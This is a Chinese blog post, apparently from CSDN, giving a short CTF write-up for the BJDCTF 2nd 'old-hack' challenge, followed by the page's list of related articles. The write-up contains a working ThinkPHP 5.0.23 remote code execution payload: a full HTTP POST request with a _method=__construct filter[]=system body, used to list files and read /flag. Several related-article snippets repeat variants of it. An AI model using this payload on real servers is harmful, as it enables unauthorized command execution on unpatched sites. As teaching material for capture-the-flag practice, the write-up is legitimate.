[BJDCTF 2nd]old-hack

最新推荐文章于 2021-09-15 22:20:51 发布
最新推荐文章于 2021-09-15 22:20:51 发布
阅读量88 收藏
点赞数
分类专栏: buu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missht0/article/details/113122029
版权

thinkphp5

s=1

img

img

使用以下方法可以进行远程命令执行https://blog.csdn.net/qq_38807738/article/details/86777541

POST /index.php?s=captcha HTTP/1.1
Host: 你的id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Connection: keep-alive
Upgrade-Insecure-Requests: 1
 
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls

所以直接post

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls

根目录里面找到flag

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat /flag
切谁怕谁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkPHP5.0.23 远程代码执行漏洞
cyzCc的博客
02-15 5544
靶场地址【安鸾渗透实战平台】http://www.whalwl.cn:8031 提示:flag在服务器根目录 直接在kali里面搜索ThinkPHP5.0.23相关漏洞 发现了 Remote Code Execution(远程代码执行漏洞) 将该漏洞cp到tp.txt文件并查看 在最下面发现该版本payload (post)public/index.php?s=captcha (data) ...
ThinkPHP5.0 漏洞测试
WindrunnerMax
02-10 2766
ThinkPHP5.0 漏洞测试 自从ThinkPHP发布漏洞补丁以来,服务器不知道多少次受到了批量扫描漏洞来抓取肉鸡的请求 虽然官方早已发布补丁,还是想试一下TP漏洞,测试两个漏洞 一、全版本执行漏洞 <!-- GET --> http://127.0.0.1/ThinkPHP/index.php?s=index/think\app/invokefunction&func...
公司网站有漏洞怎么解决
网站安全专家
01-18 3032
2019年1月14日消息,thinkphp又被爆出致命漏洞,可以直接远程代码执行,getshell提权写入网站木马到网站根目录,甚至直接提权到服务器,该漏洞影响版本ThinkPHP 5.0、ThinkPHP 5.0.10、ThinkPHP5.0.12、ThinkPHP5.0.13、ThinkPHP5.0.23、thinkphp 5.0.22版本。 攻击者可以伪造远程恶意代码,对服务器进行po...
thinkPHP5 最新代码执行漏洞
xiaoziabc的博客
01-13 2804
s=captcha _method=__construct&amp;filter[]=system&amp;method=get&amp;server[REQUEST_method]=dir   http://127.0.0.1/tp5.0.12_full/public/index.php?s=index/\think\app/invokefunction&amp;function=call...
php request漏洞利用,ThinkPHP5 核心类 Request 远程代码漏洞分析
weixin_35947806的博客
03-10 551
ThinkPHP5 核心类 Request 远程代码漏洞分析先说下xdebug+phpstorm审计环境搭建:php.ini添加如下配置,在phpinfo页面验证是否添加成功。[XDebug];xdebug.profiler_output_dir="D:\phpStudy\tmp\xdebug";xdebug.trace_output_dir="D:\phpStudy\tmp\xdebug"zen...
[BJDCTF 2nd] old-hack
Sk1y的博客
09-15 968
知识点:ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析 解题过程 打开环境 提示是thinkphp5的漏洞,测试一下index.php?s=1,报错 得到版本号:5.0.23,直接找payload:ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析 http://858341d4-67a6-4c5c-9c02-44d7380d1346.node4.buuoj.cn:81/index.php?s=1 POST传参: _method=__construct&filter[]
[BJDCTF 2nd]old-hack_thinkphp漏洞
kuller_Yan的博客
10-23 199
[BJDCTF 2nd]old-hack_thinkphp5漏洞 进入页面提示是thinkphp,先构造一个报错 然后看到版本为THINK_VERSION5.0.23 然后百度查询漏洞: payload:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / POST提交尝试一下,发现可行,然后就cat /flag ...
[BJDCTF 2nd]old-hack -wp
freerats的博客
07-04 365
进入网站,看到提示,powered By THINKPHP5 知道肯定与thinkphp5有关 传入一个s=1报错查看一下信息(这里要遇见过才知道,没什么技巧) 版本为50.0.23 post提交 _method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / 触发命令执行漏洞 cat /flag ...
[BJDCTF 2nd]old-hack ctf
wuyaowangchuan的博客
11-09 181
[BJDCTF 2nd]old-hack 告诉了我们是THINKPHP5的漏洞 搜这个版本的漏洞 发现是thinkphp5.0.23的命令执行 THINKPHP 5.0.X-5.0.23、5.1.X、5.2.X 全版本远程代码执行漏洞分析 ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析 直接用payload _method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / _method=__construct&
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin &ndash; 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
BJDCTF 2nd&ndash;TARGZ
12-21
审题,tar没用,不需要爆破 下载附件得到tar.gz压缩包 查看16进制的时候发现是PK的头,对应的题目的提示tar不好使(就是不tar压缩的) ...发现可以解压但是得到的还是压缩包,继续重复操作… 当时我解了半小时(时间沉dedao...
Python in easy steps, 2nd Edition--2018
07-29
Python in easy steps, 2nd edition makes no assumption you have previous knowledge of any programming language so it’s ideal for the newcomer to computer programming. It has an easy-to-follow style ...
[CISCN 2019 初赛]Love Math
missht0的博客
01-27 1626
[CISCN 2019 初赛]Love Math <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $bla
buu刷题记录
missht0的博客
01-18 797
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')
[网鼎杯 2020 朱雀组]phpweb
missht0的博客
01-26 711
[网鼎杯 2020 朱雀组]phpweb 抓包之后是这么个玩意 func是一个函数名,而p是一个参数,所以可以猜测用func来执行p 我们试一试highlight_file和index.php 有回显但是很乱 用func=file_get_contents&p=index.php <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo"
[GKCTF2020]EZ三剑客-EzWeb
missht0的博客
03-26 617
[GKCTF2020]EZ三剑客-EzWeb ctrl u查源码,里面有个?secret 访问后有一串代码 eth0 Link encap:Ethernet HWaddr 02:42:0a:00:73:09 inet addr:10.0.115.9 Bcast:10.0.115.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1450 Metric:1 RX
[安洵杯 2019]easy_web
missht0的博客
01-25 487
[安洵杯 2019]easy_web url里面有一串很像base64编码的字符串,解码 再解 所以我们可以猜测,url里存在文件包含漏洞,文件名可以通过hex加密一次,base64加密两次传入 试着把index.php传入 index.php hex: 696E6465782E706870 base64: Njk2RTY0NjU3ODJFNzA2ODcw base64: TmprMlJUWTBOalUzT0RKRk56QTJPRGN3 将url里面img的参数改成TmprMlJUWTBOalUz
head-first python 2nd edition
最新发布
01-05
《Head-First Python》第二版是一本由Paul Barry编写的Python编程指南。这本书以其独特的学习方式而闻名,通过大量的插图、练习和项目实例来帮助读者快速掌握Python编程的核心概念。 这本书从Python的基本语法和数据结构开始介绍,然后逐步深入讲解了面向对象编程、异常处理、文件操作、数据库访问、网络编程等高级主题。读者将学习如何利用Python编写简单的脚本,创建GUI应用程序,开发Web应用,甚至进行数据分析和人工智能方面的编程。 作者在书中还特别关注了Python的实际应用,通过实例和项目让读者学会如何将Python应用于现实世界的问题解决中。除此之外,《Head-First Python》第二版还介绍了Python社区及其丰富的资源,让读者了解如何参与到Python开发社区中来。 总的来说,这本书以简洁易懂的语言和丰富的实例让读者轻松而有趣地学习Python编程,适合各个阶段的编程学习者阅读。无论是想要入门编程的新手,还是希望深入学习Python的专业开发者都可以从中收获丰厚的知识和技能。《Head-First Python》第二版无疑是一本不可或缺的Python学习指南。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值